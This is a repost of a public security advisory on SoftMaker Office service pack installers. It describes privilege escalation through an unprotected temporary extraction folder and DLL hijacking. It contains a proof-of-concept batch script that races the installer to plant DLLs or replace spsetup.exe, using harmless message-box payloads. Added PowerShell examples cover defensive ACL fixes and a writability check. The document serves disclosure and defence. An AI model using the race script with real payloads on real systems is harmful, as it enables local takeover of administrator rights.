SoftMaker Office 201x Privilege Escalation

2017.01.05
Risk: Medium
Local: Yes
Remote: No
CVE: N/A
CWE: CWE-264

Hi @ll,

the service pack installers for SoftMaker Office 201x, available from <http://www.softmaker.com/en/servicepacks-office-windows>, are (surprise.-) vulnerable.

The executable installer (OUCH) ofw16_763.exe, a 7z SFX (OUCH), creates an UNPROTECTED directory "%TEMP%\7zSxxxxxxxx\" to extract its payload, then executes "%TEMP%\7zSxxxxxxxx\spsetup.exe". "%TEMP%\7zSxxxxxxxx\" inherits the NTFS access rights of its parent "%TEMP%\", i.e. it allows full access for the UNPRIVILEGED user.

For this well-known vulnerability see <https://cwe.mitre.org/data/definitions/377.html> and <https://cwe.mitre.org/data/definitions/379.html>

Due to the embedded application manifest, which specifies "requireAdministrator", the executable installer can only be run with administrative rights.

JFTR: if written properly, it would create a PROTECTED directory "%TEMP%\7zSxxxxxxxx\", writable only for privileged users!

The UNPRIVILEGED user, as well as any program running with the user's credentials, can modify the extracted files, for example "%TEMP%\7zSxxxxxxxx\spsetup.exe", which is executed with administrative rights, resulting in arbitrary code execution with elevation of privilege.

Additionally "spsetup.exe" is vulnerable to DLL hijacking, another well-known vulnerability. See <https://capec.mitre.org/data/definitions/471.html>, <https://cwe.mitre.org/data/definitions/426.html>, <https://cwe.mitre.org/data/definitions/427.html>, <https://technet.microsoft.com/en-us/library/2269637.aspx>, <https://msdn.microsoft.com/en-us/library/ff919712.aspx> and <https://msdn.microsoft.com/en-us/library/ms682586.aspx> plus <http://blogs.technet.com/b/srd/archive/2014/05/13/load-library-safely.aspx>

Thanks to the unprotected directory "%TEMP%\7zSxxxxxxxx\" the unprivileged user can write DLLs to "%TEMP%\7zSxxxxxxxx\" which are loaded by "spsetup.exe", again resulting in arbitrary code execution with elevation of privilege!

Proof-of-concept:
~~~~~~~~~~~~~~~~~

0. download <http://www.softmaker.net/down/ofw16_763.exe> and save it in an arbitrary directory;

1. download <http://home.arcor.de/skanthak/download/SENTINEL.DLL> (see <http://home.arcor.de/skanthak/sentinel.html> alias <https://skanthak.homepage.t-online.de/sentinel.html>) and save it in an(other) arbitrary directory;

2. save the following batch script in the same directory as SENTINEL.DLL:

--- OFW16_763.CMD ---
:WAIT
@If Not Exist "%TEMP%\7z*" Goto :WAIT
For /D %%! In ("%TEMP%\7z*") Do Set foobar=%%!
Copy "SENTINEL.DLL" "%foobar%\NTMARTA.DLL"
Copy "SENTINEL.DLL" "%foobar%\VERSION.DLL"
Copy "SENTINEL.DLL" "%foobar%\WINSPOOL.DRV"
--- EOF ---

   (The script busy-waits until the SFX has created "%TEMP%\7z*", then races the SFX: the copies must land before spsetup.exe starts and resolves its DLL imports.)

3. start the batch script;

4. execute ofw16_763.exe and notice the message boxes displayed by SENTINEL.DLL.

PWNED!

5. download <http://home.arcor.de/skanthak/download/SENTINEL.EXE> to the same directory as the batch script;

6. in the batch script replace the 3 lines Copy ... with

Copy "SENTINEL.EXE" "%foobar%\spsetup.exe"

7. start the batch script;

8. execute ofw16_763.exe and notice the message box displayed by SENTINEL.EXE.

PWNED!

Mitigations:
~~~~~~~~~~~~

* Don't use executable installers! NEVER! Don't use self-extractors! NEVER! See <http://seclists.org/fulldisclosure/2015/Nov/101> and <http://seclists.org/fulldisclosure/2015/Dec/86> plus <http://home.arcor.de/skanthak/!execute.html> alias <https://skanthak.homepage.t-online.de/!execute.html> for more information.

* Practice STRICT privilege separation: NEVER use the so-called "protected" administrator account(s) created during Windows setup, which use the same "%TEMP%" for unprivileged and privileged processes!

* Add an ACE "(D;OIIO;WP;;;WD)" to the ACL of every "%USERPROFILE%"; use <https://msdn.microsoft.com/en-us/library/aa374928.aspx> to decode it to "deny execution of files in this directory for everyone, inheritable to all files in all subdirectories".
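The advisory's JFTR above says how an elevated installer should behave: create its staging directory with an ACL of its own instead of inheriting the user-writable ACL of "%TEMP%". The following Windows PowerShell 5.1 script is an added example written for this page, not SoftMaker's or 7-Zip's code. It creates such a protected directory atomically (ACL applied at creation, so there is no window in which the inherited ACL applies) and then runs a small checker over "%TEMP%", the new directory and any live "7zS*" directory of a running SFX. Assumptions: the script runs elevated, the directory name and the `Test-LowPrivWritable` function are this example's own, and the checker treats the current account as the unprivileged party because in the "protected administrator" setup the advisory describes both halves of the split token are the same user.

```powershell
# Added example, not the advisory's code. Windows PowerShell 5.1 (.NET Framework):
# Directory.CreateDirectory(path, DirectorySecurity) is a .NET Framework overload.

function Test-LowPrivWritable {
    <# True if a principal an unprivileged user holds may create, modify or
       delete entries below $Path. Over-approximates: deny ACEs and nested group
       membership are ignored, so True means "review this", False is reliable. #>
    param([Parameter(Mandatory)][string]$Path)
    $untrusted = @(
        'S-1-1-0',       # Everyone
        'S-1-5-11',      # Authenticated Users
        'S-1-5-32-545',  # BUILTIN\Users
        'S-1-5-4',       # INTERACTIVE
        # Assumption of this example: the caller is the split-token "protected"
        # administrator, so its own SID is what the unprivileged half runs as.
        [System.Security.Principal.WindowsIdentity]::GetCurrent().User.Value
    )
    $writeMask = [int][System.Security.AccessControl.FileSystemRights]'WriteData, AppendData, WriteAttributes, WriteExtendedAttributes, Delete, DeleteSubdirectoriesAndFiles, ChangePermissions, TakeOwnership'
    $writeMask = $writeMask -bor 0x10000000 -bor 0x40000000   # GENERIC_ALL, GENERIC_WRITE
    $acl = Get-Acl -LiteralPath $Path
    foreach ($ace in $acl.GetAccessRules($true, $true, [System.Security.Principal.SecurityIdentifier])) {
        if ($ace.AccessControlType -ne [System.Security.AccessControl.AccessControlType]::Allow) { continue }
        if ($untrusted -notcontains $ace.IdentityReference.Value) { continue }
        if (([int]$ace.FileSystemRights -band $writeMask) -ne 0) { return $true }
    }
    return $false
}

# --- the fix: a staging directory only Administrators and SYSTEM can touch ---
$stage = Join-Path $env:TEMP ('stage-' + [guid]::NewGuid().ToString('N'))  # arbitrary name

$acl = New-Object System.Security.AccessControl.DirectorySecurity
$acl.SetAccessRuleProtection($true, $false)   # no inheritance from %TEMP%, copy nothing
foreach ($sid in 'S-1-5-32-544', 'S-1-5-18') { # BUILTIN\Administrators, NT AUTHORITY\SYSTEM
    $rule = New-Object System.Security.AccessControl.FileSystemAccessRule(
        (New-Object System.Security.Principal.SecurityIdentifier $sid),
        [System.Security.AccessControl.FileSystemRights]::FullControl,
        [System.Security.AccessControl.InheritanceFlags]'ContainerInherit, ObjectInherit',
        [System.Security.AccessControl.PropagationFlags]::None,
        [System.Security.AccessControl.AccessControlType]::Allow)
    $acl.AddAccessRule($rule)
}
# The DACL is part of the create call, so a watcher like the PoC's "7z*" loop
# never sees the directory in a writable state.
$null = [System.IO.Directory]::CreateDirectory($stage, $acl)

# --- the check: %TEMP% (True on a default profile), the staging dir (False),
#     and any 7zS* directory an SFX currently has open ---
'{0,-5} {1}' -f (Test-LowPrivWritable -Path $env:TEMP), $env:TEMP
'{0,-5} {1}' -f (Test-LowPrivWritable -Path $stage), $stage
Get-ChildItem -LiteralPath $env:TEMP -Directory -Filter '7zS*' -ErrorAction SilentlyContinue |
    ForEach-Object { '{0,-5} {1}' -f (Test-LowPrivWritable -Path $_.FullName), $_.FullName }

Remove-Item -LiteralPath $stage -Recurse -Force
```

On PowerShell 7 (.NET Core) the two-argument `CreateDirectory` overload does not exist; the equivalent is the `Create(DirectorySecurity)` extension method for `DirectoryInfo` from System.IO.FileSystem.AccessControl. Run the checker while the vulnerable SFX is extracting to see its "7zS*" directory reported as writable, which is the condition the PoC exploits.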
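The third mitigation above gives the ACE in SDDL form only. This added Windows PowerShell example (mine, not the advisory's) builds the same ACE from its components so each SDDL field is visible, applies it to "%USERPROFILE%", confirms the SDDL read back contains "(D;OIIO;WP;;;WD)" verbatim, and probes the effect by copying a system executable below the profile and trying to start it. Assumptions: the script runs elevated, "%TEMP%" lies below "%USERPROFILE%" (the Windows default), and the probe file name is this example's own.

```powershell
# Added example, not the advisory's code: apply "(D;OIIO;WP;;;WD)" to the profile.

$target = $env:USERPROFILE

$everyone = New-Object System.Security.Principal.SecurityIdentifier 'S-1-1-0'  # WD = Everyone
$denyExec = New-Object System.Security.AccessControl.FileSystemAccessRule(
    $everyone,
    [System.Security.AccessControl.FileSystemRights]::ExecuteFile,             # WP = 0x20, FILE_EXECUTE
    [System.Security.AccessControl.InheritanceFlags]::ObjectInherit,           # OI: inherited by files
    [System.Security.AccessControl.PropagationFlags]::InheritOnly,             # IO: not the directory itself
    [System.Security.AccessControl.AccessControlType]::Deny)                   # D
# Note: for Deny rules .NET does not add SYNCHRONIZE to the mask, so the ACE
# stays exactly 0x20 and renders as "WP" in SDDL.

$acl = Get-Acl -LiteralPath $target
$acl.AddAccessRule($denyExec)   # keeps the DACL canonical: deny ACEs ahead of allow ACEs
Set-Acl -LiteralPath $target -AclObject $acl   # propagates the inheritable ACE down the tree

$sddl = (Get-Acl -LiteralPath $target).Sddl
if ($sddl -notlike '*(D;OIIO;WP;;;WD)*') { throw "deny-execute ACE missing: $sddl" }
"applied to $target"

# Probe: a program dropped anywhere below the profile can no longer be started.
$probe = Join-Path $env:TEMP 'probe.exe'   # arbitrary name for this example
Copy-Item -LiteralPath "$env:SystemRoot\System32\whoami.exe" -Destination $probe -Force
try {
    Start-Process -FilePath $probe -Wait -NoNewWindow -ErrorAction Stop
    Write-Warning "$probe started: the ACE is not effective on this path"
} catch {
    "blocked: $probe ($($_.Exception.Message))"
}
Remove-Item -LiteralPath $probe -Force

# To revert: remove the same rule and write the ACL back.
# $acl = Get-Acl -LiteralPath $target
# $null = $acl.RemoveAccessRule($denyExec)
# Set-Acl -LiteralPath $target -AclObject $acl
```

Everyone includes the elevated administrator and SYSTEM, so the ACE also stops the vulnerable installer itself from running "%TEMP%\7zSxxxxxxxx\spsetup.exe", together with any other software that runs code out of the profile (per-user installers, updaters, scripts). That is the intended effect of the mitigation, but test it on a spare account before rolling it out.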
stay tuned
Stefan Kanthak

Timeline:
~~~~~~~~~

2016-12-15    sent vulnerability report to vendor
              no reply, not even an acknowledgement of receipt

2016-12-23    resent vulnerability report to vendor, cc CERT at German BSI
              no reply, not even an acknowledgement of receipt

2016-12-27    CERT at German BSI contacts vendor offering help
              no reply, not even an acknowledgement of receipt

2016-12-31    report published


Copyright 2018, cxsecurity.com

 
